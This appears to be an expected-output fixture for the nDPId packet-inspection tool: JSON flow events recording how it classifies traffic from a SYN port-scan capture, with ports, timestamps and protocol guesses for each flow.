+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6692,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6692,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6692,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6692,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":41511,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":41511,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":41511,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":41511,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2601,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2602,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2602,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2601,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":554,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2602,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2602,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6699,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6699,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":554,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2604,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"OSPF","breed":"Acceptable","category":"Network"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6699,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6699,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1058,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2604,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"OSPF","breed":"Acceptable","category":"Network"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1058,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2607,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 